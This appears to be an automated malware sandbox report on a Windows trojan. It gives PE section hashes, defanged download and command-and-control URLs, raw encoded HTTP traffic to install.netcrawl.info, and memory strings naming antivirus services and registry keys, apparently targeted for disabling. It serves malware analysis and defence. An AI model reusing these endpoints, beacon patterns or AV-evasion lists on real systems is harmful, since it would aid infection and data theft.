Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Static Analysis

VersionInfo

No information is available.

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
.text	4096	22738	23040	4.49116	4dde9ee04459a4d76108ba4e7e9cf6a4
.rdata	28672	4496	4608	3.59034	a2c7710fa66fcbb43c7ef0ab9eea5e9a
.data	36864	253816	1024	3.1957	acf5fcee4a8110074c3935a8dde700a9
.ndata	290816	688128	0	0	d41d8cd98f00b204e9800998ecf8427e
.rsrc	978944	81920	80384	5.5234	b13f4a1cf59c57c4de44cfc5ec7498cd

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Network Activity

URLs

URL	IP
hxxp://netcrawl.info/mg?alpha=Yy0QEkASO15SQ1hDPzhPXGRSAUU9PhQuABg9RxQvJy0LWFN1Bh0RLmVpemBlOCYQQDpqRnphBXc2M0tWZGVrE0IPKVd7TjADBB4DTHQycUIhMRZDHHUoWG5AFUMPUFxlfFEERTZRDWQuYW8MFBE/OxVHPHUCPR1bPD0cH1tmeGYSRQctWwQwRnsDEh9uWXAhBCwyABZCJiVEdn99bQw1YA==
hxxp://netcrawl.info/mg?alpha=ZipYEQsoExhAOykfdzsEZ24LHAtmbFpgfhBAXCVjFHwZAgk1X0VjFGNgWWVfOj5AQ3YSXjAWPHIue08UdSJiHH4efUReADZ3QzZrVi9y
hxxp://netcrawl.info/mg?alpha=bCJoDyB3OAkNWi4aRyUvU2sqHCUyECYDUXxPdQ==
hxxp://netcrawl.info/fp?alpha=cB8wD2sbaltIeCsAHyVkcVtjAmtwQyZ+Klceaw5hNRlhbG4hZUYNcXVAKQ48JRQxKxB4dCwIKW4EZlIJd0xJehUcb3Aae2IacgddER5bZHQwAitfP2IeZ3BsAHA3UHZ/SGwdbi1qNngYc1UsCDwrDTBZFm1oXg0reksiDXATNwteX0sAdxV9JRc2DT4cHkVxOzQTZV8nZ0l1IT8bIzJddX9eZUh+JDUgfg1iC3gZPykZZFkBIjRTbXEzTD8KNWUuGVxFQEIuTDp4FmUaQmhrUDMrZg40XjZnGmNzaRAgcRF6GAIRNAYycWFR
hxxp://netcrawl.info/ii?alpha=cB8wD2sVS28rRB0vHyVkcVtjAmtwQzwnZl8yJB4uIkN6SC5lbk4sQQEffU5mOlBzD1UJPVMPKW0df1N7a0tPER8eGXoTZTcaZQd/XXAfIn9xVDsrN2IcEwcfAWw3SnF/U2hoaS1+QnwFcEArCE4uDzAvH3IbXAQ/MV9sUGszR04PHBoDchVzIEA4CD4IF0Zpf2ZWYCx1ORc8JiNGLW0PImAaOU8cZzxWdANsXTILMywJK18ScWtIWnwzZT4AcBApWlBeWlQyRmBGGnheYUtcWnFqMB5kB3NwRSY1PkR8TxQkNBEvRjhhc1cgWyYCa0oqRGklOlUvPwtOajVGPwIhZQwZTV5HQiwDZzFGOAsgDhlGYXlxVnQYbjVPdTM6VSoiR2d1UGwPMWY/YSdSfyhyXmZ1Sm1KDxU3B0l8OAkCFywxHw8WC0Bbfxd7f0FmB3caTgBsYDIfN141cEc0fmsGezI+fXRHZm8aL2Y1c3QGS3hNN0p0cgtVJXk4VGsoXDAPbQw+OR9lT18mAxljGmBfKFlBFWxoJEk7XzU/MjlFMRo=
hxxp://install.netcrawl.info/ii?alpha=cB8wD2sVS28rRB0vHyVkcVtjAmtwQzwnZl8yJB4uIkN6SC5lbk4sQQEffU5mOlBzD1UJPVMPKW0df1N7a0tPER8eGXoTZTcaZQd/XXAfIn9xVDsrN2IcEwcfAWw3SnF/U2hoaS1+QnwFcEArCE4uDzAvH3IbXAQ/MV9sUGszR04PHBoDchVzIEA4CD4IF0Zpf2ZWYCx1ORc8JiNGLW0PImAaOU8cZzxWdANsXTILMywJK18ScWtIWnwzZT4AcBApWlBeWlQyRmBGGnheYUtcWnFqMB5kB3NwRSY1PkR8TxQkNBEvRjhhc1cgWyYCa0oqRGklOlUvPwtOajVGPwIhZQwZTV5HQiwDZzFGOAsgDhlGYXlxVnQYbjVPdTM6VSoiR2d1UGwPMWY/YSdSfyhyXmZ1Sm1KDxU3B0l8OAkCFywxHw8WC0Bbfxd7f0FmB3caTgBsYDIfN141cEc0fmsGezI+fXRHZm8aL2Y1c3QGS3hNN0p0cgtVJXk4VGsoXDAPbQw+OR9lT18mAxljGmBfKFlBFWxoJEk7XzU/MjlFMRo=	8.34.112.26
hxxp://install.netcrawl.info/mg?alpha=Yy0QEkASO15SQ1hDPzhPXGRSAUU9PhQuABg9RxQvJy0LWFN1Bh0RLmVpemBlOCYQQDpqRnphBXc2M0tWZGVrE0IPKVd7TjADBB4DTHQycUIhMRZDHHUoWG5AFUMPUFxlfFEERTZRDWQuYW8MFBE/OxVHPHUCPR1bPD0cH1tmeGYSRQctWwQwRnsDEh9uWXAhBCwyABZCJiVEdn99bQw1YA==	8.34.112.26
hxxp://install.netcrawl.info/fp?alpha=cB8wD2sbaltIeCsAHyVkcVtjAmtwQyZ+Klceaw5hNRlhbG4hZUYNcXVAKQ48JRQxKxB4dCwIKW4EZlIJd0xJehUcb3Aae2IacgddER5bZHQwAitfP2IeZ3BsAHA3UHZ/SGwdbi1qNngYc1UsCDwrDTBZFm1oXg0reksiDXATNwteX0sAdxV9JRc2DT4cHkVxOzQTZV8nZ0l1IT8bIzJddX9eZUh+JDUgfg1iC3gZPykZZFkBIjRTbXEzTD8KNWUuGVxFQEIuTDp4FmUaQmhrUDMrZg40XjZnGmNzaRAgcRF6GAIRNAYycWFR	8.34.112.26
hxxp://install.netcrawl.info/mg?alpha=ZipYEQsoExhAOykfdzsEZ24LHAtmbFpgfhBAXCVjFHwZAgk1X0VjFGNgWWVfOj5AQ3YSXjAWPHIue08UdSJiHH4efUReADZ3QzZrVi9y	8.34.112.26
hxxp://install.netcrawl.info/mg?alpha=bCJoDyB3OAkNWi4aRyUvU2sqHCUyECYDUXxPdQ==	8.34.112.26

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /mg?alpha=Yy0QEkASO15SQ1hDPzhPXGRSAUU9PhQuABg9RxQvJy0LWFN1Bh0RLmVpemBlOCYQQDpqRnphBXc2M0tWZGVrE0IPKVd7TjADBB4DTHQycUIhMRZDHHUoWG5AFUMPUFxlfFEERTZRDWQuYW8MFBE/OxVHPHUCPR1bPD0cH1tmeGYSRQctWwQwRnsDEh9uWXAhBCwyABZCJiVEdn99bQw1YA== HTTP/1.1

User-Agent: WinHttpClient

Host: install.netcrawl.info

Connection: Keep-Alive

HTTP/1.1 200 OK

Cache-Control: no-cache, no-store

Pragma: no-cache

Content-Type: text/plain; charset=utf-8

Expires: -1

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

SVR: SP003C2

X-Powered-By: ASP.NET

p3p: CP="CAO PSA OUR"

Date: Sun, 20 Sep 2015 01:39:17 GMT

Content-Length: 184148

QHKPEGQYa9RZFEVHsmw7VyrLGGsVZdAHLyRF2UByTz/BQihVW51sGDpL8HEnAHbKFFwYFusAXQ03nhkwBny6bEN8YtEeJEBy3EBPbS sbGxcK9UdJEQikiwxZVjYBh4Xf5ZTcx9QyjpWXiLFSXdPMfQUXBlCtGF CSeFXngTdq9TRzJilE82VnHbQSM2JKgiJVdymxRwBySefm5yXsgHNVpowV81BwSHbhZQdNpWYA5umD1jPHnzDjQcJZoUYE81kHlxSgWwYA5ia9tXZGI2iiE4RizWHVsDM7YAJ2NeywsrE2C/ahVAW88QSAgijwRzTTjPEGYRWbQALAIxghBuV3K7UEd9NJhYBEBy3EAjNiy8IjoefN8eegUipD0gb1rYISATcIgUa0Nf0yVfXiLKVWFbO8gRCkpSsE5lCWjMGToUdLcCGGoyiFkvDWWLTGUuePB ehAqwAFtRH3IFB9Ve59OagZyl15zHxzsL0kbbtdDd0I11gZ0LGSjTXUJN51cDxp5qlRNbGLRHiRActxAT20vrGxsXCvVHSREIpIsMWVY2AYeF3 WU3MfUMo6Vl4ixUl3TzH0FFwZQrRhfgknhV54E3avU0cyYpRPNlZx20EjNiSoIiVXcpsUcAcknn5ucl7IBzVaaMFfNQcEhmcWUHTaVmAObpg9YyNj8w40HCWaFGBPNZBZUXcuiVkgT3/FVl1QEb08P1w5ylMkRDGLMCFjYtwPLVQpjUM9SRKdM0ICZcBSYEgC2xldFRbrTGMAKMJeJBploEVsfzSUSjdidsxGai54ry86QTuVU2EVI50zJmIOhwQpGmCGGnNARt41TlA611RwSSmWDgoZUPMYL15ozAg7BXLhGgBWC65rcA082UR1ZGDzbAVLLdAffAM1hD04dXDhIz0CfLFDP1Yck3RME2zWQ0tNOd9XEh5BvU46TiGWDCcWY6ZEdH8siFlwG3DcSW0gYK8hJFE79xB8DzGPHzxjT9ZAchByj0U0CRzWJV4Fb9FCJxYy2xlbFRjzR24NJ5peeAFltkVfMjvfVTYDJJAWLS42sD4zEGSbOUM1EMhwdnZNyQpqTDGwTyJMUMszSBxhz1VZcATIGks0QbxSNEBmmB0uAHKNQU97YsdSJ01yhQdkdDKsLSJXOu8QZBMiyGY6c0DRTmoQfJFVNGtfyz9MF0PLQ2ZHdoATSRxHtA40BTeKCy0Hc EaRH8sjll A3vRRGJ4YPM6JEc7xF1zRC6Ofm4/GJFAPA9jhhRrB3b0BW1QLIFWZFg8mE8KPV2yUHkfK4gIHilAqk5GcTeOYA5ia9tXZGI2nyskQTfWH1Q6EoQ1OnVY3A4kKk iWCVMctAxXRdygQonWjXWAE0 VbxHNFYqmxAuWTWmWFJ7I4lZNnd/xVBkLninOzpecpsXZxQkjxI1ckXLBwsedoBdcx9Y3jpJFyyBT3ZII9UHTFIOt0N6HyHCXicNdqBUACQ0j0k3XDLSB2hoYPN3bh58zQh4A2XQfhxNf pAZFRjgkI5BwSdJUMBdNRDZEcI

<<< skipped >>>

POST /mg?alpha=bCJoDyB3OAkNWi4aRyUvU2sqHCUyECYDUXxPdQ== HTTP/1.1

Content-Length: 246

Content-Type: application/x-www-form-urlencoded

User-Agent: WinHttpClient

Host: install.netcrawl.info

Connection: Keep-Alive

alpha=bCJoDyADD08zBl9NRyUvU2sqHCUyMWwzYBcyPwlPKCJzRTN6CWUMTmpmAn0FNyloXVplSQJ8ZXg5S1Y2a2oTDiIAJi9mLj8MfANjQ3tKbCIuPm5efHonIHMgGkx3TTxqcykZJTledXlObmB0CXEwNG1aXHoNRQA7MzJkAjtpdx4PJQgiIxlQSXR7D39hVgg8ZCM9eAsiKSo8ZXFcQWNNIGtzNgUkOFx0cUZqGz1uMBcgLg==

HTTP/1.1 200 OK

Cache-Control: no-cache, no-store

Pragma: no-cache

Content-Type: text/plain

Expires: -1

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

SVR: SP003C2

X-Powered-By: ASP.NET

p3p: CP="CAO PSA OUR"

Date: Sun, 20 Sep 2015 01:39:20 GMT

Content-Length: 0

GET /mg?alpha=ZipYEQsoExhAOykfdzsEZ24LHAtmbFpgfhBAXCVjFHwZAgk1X0VjFGNgWWVfOj5AQ3YSXjAWPHIue08UdSJiHH4efUReADZ3QzZrVi9y HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: install.netcrawl.info

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Cache-Control: no-cache, no-store

Pragma: no-cache

Content-Type: text/plain; charset=utf-8

Expires: -1

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

SVR: SP001C2

X-Powered-By: ASP.NET

p3p: CP="CAO PSA OUR"

Date: Sun, 20 Sep 2015 01:39:17 GMT

Content-Length: 2004

aNEaHLo37W9O8F qJ2Dlf4leFLU9xkUL8QzmTEysZohaGPt07U943njrfWaWJtsNCZcs/2YU6he KCTZEOgKb4lEkQ1e ErSUl2tS40PJ/xGoV8YpDiNHDX5ctNsC/Mu9gRArSG/XDuIL8Z4S7Zh1RUXgzT7aAytPJceE g40ABNkEOGSgrifNFQBf1Cji4h7VScWBSgK6cXNelFrRII9zLDExatZO5OLYsoxxQQvWWbXBzaevI8T6swxUEE7ijRKwCHFIoMErYwjRALq12ROWCyOLVnLoFsyF0g61rnClS0DckFU F5 Fg0hTbQanaLdphMHIUrtwlBpi2TFAK cZYgTZBDhiZR4WyfBkeqSI1wYO1ijUkeoiuAKTHmW oKVPgr3BoWrWvyWDmBFMJCQ61htEcclTO1fkipKJQeXL40xzJbk0SHSgrqaNFPTPMGhCQj627fFgmkO4ECfPEM5kxMrGeBWhj7dO1PeN546315jCbbDQmXLP9mFOoXnggZ8inRJEKdWpA0bN99z1VHuFfDcGD e5FZGJgviRpysED6RAK6fNUOSupu6U8 sjvPQ0/5PplaFZp0tSJBuieCNRHoNMIzb5RTgAMStm/cUFq6CMM1Mextkl4Z9HSCHjz5S6MKC 4/0wIYtXnvXz ZdtgUQ78mzRZL2nrjPV6tZt1ZONcO43QA3kaCHFiuM59vUKxNjygn nScQA6KEqUKJOV8 kYdtHKSAFvjePhkO4k/gQxErmibA1uTIOchTbwhgy0R8CjRdBaSQ48EHK5v0k5KumqAKCv f75EGLUlxkU260L8TUK0N8MSTeB/ QhggjvPRU/3JpJXGJUstX5aujGCBlznf90yDsYP0EQS HDNWQvlBqkXEd840Q4NtzqMXWqoffZbB/gq1QRU7mHudga0KMxVbq5phw1V1C72KFutCoYWFb5n2iNAkBrBDUj8bN5ITLtygDA37TjHQgi6IshdNuVc7E0g9yrZAF/MZfhJMcZgxVdGqGHbDRCFPOArXKxm3R0R8C7Reg6ZToILRK4zyU5culnNJ2Dhft8WROJixgsp kutEkzeFeMhGKMv7UsujHiZFGeyZ4VACpk 4xhyny2JHx/rLugKb4lEkQ1e F/YTlq2S48AHt10lEIOoi IEwzWb FcB9ox1xFf/S xCCyFNtZTZLppkg1DmC37KALqIZ8LFf8p0TJ6nVqWDRK2Z8hQRfMGhzMw63 zTQm/OIE8OO9N5ApU8D/cBV jL/RZPpM10VII4WKWQwqTdLUhVqknk1lK6C/BM1HQTcEBVK4zjAwb8waVJTLtOMcONZ0ds118qF7uXAa0ZJI7U x/8lk1gi7/an2yapNADoUEywdbujaCFQTKOMYlRZNYvzRl4mDTT12 SI0AHt9zj0kOvi WFHKmDPlJAuM7/hdX6i nRC INo8UT6N0kkwNkzzBJUK9IcVBHukx2HoOmlmRC1XCaMlVX7pniTkh4zjHShy6PYFTcuNd618B5DqSTFzuYe5PdsY/21dJrybN

<<< skipped >>>

GET /fp?alpha=cB8wD2sbaltIeCsAHyVkcVtjAmtwQyZ+Klceaw5hNRlhbG4hZUYNcXVAKQ48JRQxKxB4dCwIKW4EZlIJd0xJehUcb3Aae2IacgddER5bZHQwAitfP2IeZ3BsAHA3UHZ/SGwdbi1qNngYc1UsCDwrDTBZFm1oXg0reksiDXATNwteX0sAdxV9JRc2DT4cHkVxOzQTZV8nZ0l1IT8bIzJddX9eZUh+JDUgfg1iC3gZPykZZFkBIjRTbXEzTD8KNWUuGVxFQEIuTDp4FmUaQmhrUDMrZg40XjZnGmNzaRAgcRF6GAIRNAYycWFR HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: install.netcrawl.info

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Cache-Control: no-cache, no-store

Pragma: no-cache

Content-Type: text/plain

Expires: -1

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

SVR: SP001C2

X-Powered-By: ASP.NET

p3p: CP="CAO PSA OUR"

Date: Sun, 20 Sep 2015 01:39:20 GMT

Content-Length: 0

HTTP/1.1 200 OK..Cache-Control: no-cache, no-store..Pragma: no-cache..Content-Type: text/plain..Expires: -1..Server: Microsoft-IIS/7.5..X-AspNet-Version: 4.0.30319..SVR: SP001C2..X-Powered-By: ASP.NET..p3p: CP="CAO PSA OUR"..Date: Sun, 20 Sep 2015 01:39:20 GMT..Content-Length: 0......

GET /ii?alpha=cB8wD2sVS28rRB0vHyVkcVtjAmtwQzwnZl8yJB4uIkN6SC5lbk4sQQEffU5mOlBzD1UJPVMPKW0df1N7a0tPER8eGXoTZTcaZQd/XXAfIn9xVDsrN2IcEwcfAWw3SnF/U2hoaS1+QnwFcEArCE4uDzAvH3IbXAQ/MV9sUGszR04PHBoDchVzIEA4CD4IF0Zpf2ZWYCx1ORc8JiNGLW0PImAaOU8cZzxWdANsXTILMywJK18ScWtIWnwzZT4AcBApWlBeWlQyRmBGGnheYUtcWnFqMB5kB3NwRSY1PkR8TxQkNBEvRjhhc1cgWyYCa0oqRGklOlUvPwtOajVGPwIhZQwZTV5HQiwDZzFGOAsgDhlGYXlxVnQYbjVPdTM6VSoiR2d1UGwPMWY/YSdSfyhyXmZ1Sm1KDxU3B0l8OAkCFywxHw8WC0Bbfxd7f0FmB3caTgBsYDIfN141cEc0fmsGezI+fXRHZm8aL2Y1c3QGS3hNN0p0cgtVJXk4VGsoXDAPbQw+OR9lT18mAxljGmBfKFlBFWxoJEk7XzU/MjlFMRo= HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: install.netcrawl.info

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Cache-Control: no-cache, no-store

Pragma: no-cache

Content-Type: text/plain; charset=utf-8

Expires: -1

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

SVR: SP001C2

X-Powered-By: ASP.NET

p3p: CP="CAO PSA OUR"

Date: Sun, 20 Sep 2015 01:39:20 GMT

Content-Length: 84

gtXkIIKIj6Yk95222VzDhJimNJ2G2qMt8IvZgnCClsH6apXd96EKsJyFpXOQnZK2IOyI/c9 nNODAqYod5NuHTTP/1.1 200 OK..Cache-Control: no-cache, no-store..Pragma: no-cache..Content-Type: text/plain; charset=utf-8..Expires: -1..Server: Microsoft-IIS/7.5..X-AspNet-Version: 4.0.30319..SVR: SP001C2..X-Powered-By: ASP.NET..p3p: CP="CAO PSA OUR"..Date: Sun, 20 Sep 2015 01:39:20 GMT..Content-Length: 84..gtXkIIKIj6Yk95222VzDhJimNJ2G2qMt8IvZgnCClsH6apXd96EKsJyFpXOQnZK2IOyI/c9 nNODAqYod5Nu....

Map

The Virus connects to the servers at the folowing location(s):

Strings from Dumps

Explorer.EXE_532_rwx_01E00000_00002000:

SHELL32.DLL

ShellExecuteA

KERNEL32.DLL

.rsrc

.text

Explorer.EXE_532_rwx_01E10000_00001000:

|explorer.exeM_532_

Explorer.EXE_532_rwx_038F0000_0108E000:

c:\windows

hXXp://erenkarahan.com/images/logo.gif

hXXp://gutekpl.za.pl/logo.gif

hXXp://VVV.kapudane.com/logo.gif

hXXp://igorfomin.ru/logo.gif

hXXp://m2comunicacion.com/images/logo.gif

hXXp://leenaenterprises.com/img/logo.gif

hXXp://VVV.geriatriasinop.com.br/img/button.gif

hXXp://britishmotors.it/logo.gif

hXXp://artroom.com.tr/blog/logo.gif

hXXp://gammaconseil.fr/images/button.gif

hXXp://xexylia.com/logo.gif

%System%\drivers\olitq.sys

8317508876

SHELL32.DLL

ShellExecuteA

KERNEL32.DLL

.rsrc

.text

hXXp://89.119.67.154/testo5/

hXXp://kukutrustnet777.info/home.gif

hXXp://kukutrustnet888.info/home.gif

hXXp://kukutrustnet987.info/home.gif

KERNEL32.dll

USER32.dll

h.rdata

H.data

.reloc

ntoskrnl.exe

Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.1 (.NET CLR 3.5.30731)

Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache

Software\Microsoft\Windows\CurrentVersion\Internet Settings

Software\Microsoft\Windows\CurrentVersion

hXXp://VVV.klkjwre9fqwieluoi.info/

hXXp://kukutrustnet777888.info/

Software\Microsoft\Windows\CurrentVersion\policies\system

Software\Microsoft\Windows\ShellNoRoam\MUICache

%s:*:Enabled:ipsec

SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced

GdiPlus.dll

hXXp://

ipfltdrv.sys

VVV.microsoft.com

?%x=%d

&%x=%d

SYSTEM.INI

USER32.DLL

.%c%s

\\.\amsint32

NTDLL.DLL

autorun.inf

ADVAPI32.DLL

win%s.exe

%s.exe

WININET.DLL

InternetOpenUrlA

avast! Web Scanner

Avira AntiVir Premium WebGuard

cmdGuard

cmdAgent

Eset HTTP Server

ProtoPort Firewall service

SpIDer FS Monitor for Windows NT

Symantec Password Validation

WebrootDesktopFirewallDataService

WebrootFirewall

%d%d.tmp

SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList

%s\%s

%s\Software\Microsoft\Windows\CurrentVersion\Ext\Stats

Software\Microsoft\Windows\CurrentVersion\Ext\Stats

SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects

Explorer.exe

A2CMD.

ASHWEBSV.

AVGCC.AVGCHSVX.

DRWEB

DWEBLLIO

DWEBIO

FSGUIEXE.

MCVSSHLD.

NPFMSG.

SYMSPORT.

WEBSCANX.

.adata

M_%d_

%c%d_%d

?456789:;

!"#$%&'()* ,-./0123

GetProcessHeap

GetWindowsDirectoryA

RegEnumKeyExA

RegDeleteKeyA

RegOpenKeyExA

RegCreateKeyA

RegCloseKey

SHFileOperationA

&3&3&3&389

.rdata

.data

rnl.exe?

= =$=(=,=0=4=8=

rv:1.9.2.3)

.NEtCLR

.klkjw:9fqwiBu

f3a.sysB

D6c.pBTab

drfig%s:*:

0}.T&?%x=

~UrlA'W

\'Web%

HTTP)s'PJ

o.ENHCD

KPCKwWEBWUPD

>*?456789:;

!"#$%&'()* ,-./01230 0

ADVAPI32.dll

MSVCRT.dll

SHELL32.dll

WS2_32.dll